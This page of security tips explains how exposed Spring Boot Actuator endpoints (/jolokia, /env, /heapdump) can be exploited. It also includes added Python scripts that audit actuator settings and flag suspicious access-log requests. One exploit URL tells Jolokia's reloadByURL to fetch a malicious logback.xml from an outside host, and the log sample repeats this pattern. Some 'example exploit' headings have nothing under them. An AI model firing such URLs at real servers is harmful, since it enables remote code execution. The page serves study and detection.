Spring Actuators
Image source: https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png

Check the original post at https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
Spring Boot Actuators register endpoints such as `/health`, `/trace`, `/beans`, `/env`, etc. In versions 1 to 1.4, these endpoints are accessible without authentication. From version 1.5 onwards, only `/health` and `/info` are non-sensitive by default, but developers often disable this security.
Certain Actuator endpoints can expose sensitive data or allow harmful actions: `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, and `/heapdump`.
In Spring Boot 1.x, actuators are registered under the root URL, while in 2.x they are under the `/actuator/` base path.
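As an added, defender-side example (not part of the original page or the Veracode post), the following Python script audits the text of an `application.properties` file for the settings that leave the endpoints above reachable. It understands both the 1.x property names (`endpoints.*`, `management.security.enabled`) and the 2.x names (`management.endpoints.web.exposure.*`, `management.endpoint.*`). The weak and hardened property blocks are constructed for the demo; `management.endpoint.env.post.enabled` is the Spring Cloud flag that gates `POST /actuator/env`, and since its default depends on the Spring Cloud version, the script only reports it when it is set explicitly.

```python
"""Audit Spring Boot actuator settings found in application.properties text.

Added example (not code from the original page). Flags properties that leave
sensitive actuator endpoints reachable, for 1.x and 2.x property names.
"""
from typing import Dict, List

# Endpoints the page lists as exposing sensitive data or allowing harmful actions.
SENSITIVE = {"dump", "trace", "logfile", "shutdown", "mappings", "env",
             "restart", "heapdump", "jolokia"}


def parse_properties(text: str) -> Dict[str, str]:
    """Minimal .properties parser: key=value (or key: value) lines, '#'/'!' comments."""
    props: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if not sep:
            key, sep, value = line.partition(":")
        props[key.strip()] = value.strip()
    return props


def _truthy(value: str) -> bool:
    return value.strip().lower() in ("true", "1", "yes")


def audit(props: Dict[str, str]) -> List[str]:
    """Return a list of findings; an empty list means nothing risky was found."""
    findings: List[str] = []

    # --- Spring Boot 2.x: an endpoint is only reachable over HTTP if it is
    # included in web exposure (default is health, or health+info, never '*').
    exposed = props.get("management.endpoints.web.exposure.include", "")
    names = {n.strip() for n in exposed.split(",") if n.strip()}
    if "*" in names:
        findings.append("2.x: all actuator endpoints exposed over HTTP (exposure.include=*)")
    else:
        for name in sorted(names & SENSITIVE):
            findings.append(f"2.x: sensitive endpoint '/actuator/{name}' exposed over HTTP")
    if _truthy(props.get("management.endpoint.shutdown.enabled", "false")):
        findings.append("2.x: /actuator/shutdown is enabled")
    # Spring Cloud flag for the writable env endpoint; default varies by version,
    # so only an explicit 'true' is reported here (assumption: set it explicitly).
    if _truthy(props.get("management.endpoint.env.post.enabled", "false")):
        findings.append("2.x: POST /actuator/env (property modification) enabled")

    # --- Spring Boot 1.x: endpoints live under the root URL; 'sensitive' ones
    # require authentication only while management.security.enabled=true.
    sec = props.get("management.security.enabled")
    if sec is not None and not _truthy(sec):
        findings.append("1.x: management security disabled; sensitive endpoints need no auth")
    if props.get("endpoints.sensitive", "true").lower() == "false":
        findings.append("1.x: all endpoints marked non-sensitive (endpoints.sensitive=false)")
    for name in sorted(SENSITIVE):
        if props.get(f"endpoints.{name}.sensitive", "true").lower() == "false":
            findings.append(f"1.x: endpoint '/{name}' marked non-sensitive")
    return findings


def audit_text(text: str) -> List[str]:
    """Convenience wrapper: parse then audit."""
    return audit(parse_properties(text))


# Constructed sample configurations (not taken from any real project).
WEAK_2X = """
management.endpoints.web.exposure.include=*
management.endpoint.shutdown.enabled=true
management.endpoint.env.post.enabled=true
"""

HARDENED_2X = """
# expose only the endpoints that are non-sensitive by default
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=env,heapdump,jolokia
management.endpoint.shutdown.enabled=false
management.endpoint.health.show-details=never
"""

WEAK_1X = """
management.security.enabled=false
endpoints.env.sensitive=false
"""

if __name__ == "__main__":
    for label, cfg in (("weak 2.x", WEAK_2X), ("hardened 2.x", HARDENED_2X), ("weak 1.x", WEAK_1X)):
        print(label, "->", audit_text(cfg) or ["ok"])
```

Run it against a real properties file with `audit_text(open(path).read())`; YAML configuration is not parsed here, so flatten it to properties first or extend `parse_properties`.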
Remote Code Execution via '/jolokia':
The `/jolokia` actuator endpoint exposes the Jolokia Library, which allows HTTP access to MBeans.
The `reloadByURL` action can be exploited to reload logging configurations from an external URL, which can lead to blind XXE or Remote Code Execution via crafted XML configurations.
Example exploit URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
Config Modification via '/env':
If Spring Cloud Libraries are present, the `/env` endpoint allows modification of environmental properties.
Properties can be manipulated to exploit vulnerabilities, such as the XStream deserialization vulnerability in the Eureka serviceURL.
Example exploit POST request:
Other Useful Settings:
Properties like `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, and `spring.datasource.tomcat.max-active` can be manipulated for various exploits, such as SQL injection or altering database connection strings.
A comprehensive list of default actuators can be found here.
The `/env` endpoint in Spring Boot 2.x uses JSON format for property modification, but the general concept remains the same.
Env + H2 RCE:
Details on exploiting the combination of the `/env` endpoint and the H2 database can be found here.
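For detection, here is an added Python example (not part of the original page) that scans access-log lines for requests to the sensitive actuator endpoints discussed above, in both the 1.x root-URL layout and the 2.x `/actuator/` layout. It labels `POST` requests to `/env` (property modification) and Jolokia `reloadByURL` calls separately, and strips query strings and matrix parameters (`;key=value`) before matching so that path variants still resolve to the endpoint name. The log lines are constructed in combined log format; the client address in `example.invalid` and the IPs are placeholders.

```python
"""Flag access-log lines that reach sensitive Spring Boot actuator endpoints.

Added example (not code from the original page). Sample log lines are
constructed for the demo; nothing here is taken from a real system.
"""
import re
from typing import Iterable, List, Optional, Tuple

SENSITIVE = ("dump", "trace", "logfile", "shutdown", "mappings", "env",
             "restart", "heapdump", "jolokia")

# Method, path and status from a combined-format access log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def normalize_path(path: str) -> str:
    """Drop the query string and per-segment matrix parameters: /env;a=b/x?y=1 -> /env/x."""
    path = path.split("?", 1)[0]
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def classify(path: str, method: str) -> Optional[str]:
    """Return a finding label if the request targets a sensitive endpoint, else None."""
    segments = [s for s in normalize_path(path).split("/") if s]
    if not segments:
        return None
    # 2.x: /actuator/<name>/...   1.x: /<name>/...
    if segments[0] == "actuator" and len(segments) > 1:
        name = segments[1]
    else:
        name = segments[0]
    if name not in SENSITIVE:
        return None
    if name == "env" and method == "POST":
        return "env-modification"
    if name == "jolokia" and "reloadByURL" in path:
        return "jolokia-reloadByURL"
    return f"sensitive-endpoint:{name}"


def scan(lines: Iterable[str]) -> List[Tuple[str, str, str, str, str]]:
    """Return (client, method, path, status, label) for each matching log line.

    All statuses are kept: a 2xx means the endpoint was actually reachable,
    a 401/403 shows a blocked attempt, a 404 that it is not deployed.
    """
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        label = classify(m["path"], m["method"])
        if label:
            hits.append((line.split()[0], m["method"], m["path"], m["status"], label))
    return hits


# Constructed sample log (combined format); addresses and hosts are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /actuator/health HTTP/1.1" 200 15',
    '10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /actuator/env HTTP/1.1" 200 4521',
    '10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "POST /actuator/env HTTP/1.1" 200 0',
    '10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /jolokia/exec/ch.qos.logback.classic:'
    'Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/'
    'http:!/!/example.invalid!/logback.xml HTTP/1.1" 200 88',
    '10.0.0.9 - - [10/Oct/2023:13:56:10 +0000] "GET /heapdump;x=1?download=true HTTP/1.1" 403 0',
    '10.0.0.5 - - [10/Oct/2023:13:56:20 +0000] "GET /api/users HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

In practice, feed `scan()` the access log of the reverse proxy in front of the application and alert on any 2xx hit for an endpoint that is not meant to be exposed; a 2xx on `env-modification` or `jolokia-reloadByURL` warrants an immediate response.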
SSRF on Spring Boot Through Incorrect Pathname Interpretation:
The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
Example exploit request: